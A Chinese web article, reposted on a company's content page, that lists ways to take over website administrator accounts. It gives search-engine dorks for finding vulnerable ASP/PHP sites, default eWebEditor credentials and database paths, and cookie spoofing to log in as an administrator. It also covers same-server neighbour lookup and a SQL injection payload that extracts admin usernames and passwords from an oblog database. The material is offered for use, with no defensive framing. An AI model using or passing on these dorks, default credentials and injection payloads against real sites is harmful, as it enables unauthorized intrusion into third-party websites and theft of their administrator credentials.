大数跨境

拿网站管理员帐号的几种方法总结

拿网站管理员帐号的几种方法总结 元中科技公司
2020-04-15
3
导读:一:网站漏洞1, GOOGLE,搜索inurl:/Html/About.sk.asp?ID=13 (默认后台

一:网站漏洞

1, GOOGLE,搜索inurl:/Html/About.sk.asp?ID=13 (默认后台是server)

2, 杭州 inurl:Article_Class2.asp?

3,inurl:detail.php?

4,CompHonorBig.asp?id=

5,inurl:show.asp?

6,ewebeditor编辑器漏洞入侵:inurl:ShopMore.asp?id

默认帐号密码为: admin admin888 !常用的密码还有admin admin999 admin1 admin000

默认数据库路径为: ewebeditor/db/ewebeditor.mdb

常用数据库路径为:ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb

7,良精科技漏洞:Google搜索:allinurl: DownloadShow.asp?DownID=

在百度搜索:inurl: DownloadShow.asp?DownID=

Google搜索:格式0571-85635810

(载默认数据库 地址:Databases/#Database.mdb 默认后台:admin/login.asp)

8,Google高级搜索:inurl:xx.xx;

site:xxx.xxx 页面 例:site:hebxh.com asp

inurl:admin

asp?id=

二:Cookie欺骗

修改Cookie登陆管理员帐号。适用于下载到数据库,但MD5无法破解密码时。

三:旁注。

http://www.myipneighbors.com/ www.114best.com查询同一服务器下的网站。

四:宏利0day弱口令:

通过搜索该公司其他网站的管理员入口来寻找该网站登录网址。

五:obolg漏洞:

关键字:inurl:tags.asp或者Copyright by oblog.cn

爆出管理用户.

t=user&keyword=trace&tagid=30 group by userid) a,oblog_user b where a.userid=b.userid and 1=2 union select username+chr(124)+password,2,3 from oblog_admin union select top 100 b.userName,b.user_dir,b.user_folder from (select userid from oblog_usertags where tagid=30 and 1=2


【声明】内容源于网络
0
0
元中科技公司
元中科技打造一站式建站系统,方便不会代码的您制作自己的网站。
内容 12
粉丝 0
元中科技公司 元中科技打造一站式建站系统,方便不会代码的您制作自己的网站。
总阅读6
粉丝0
内容12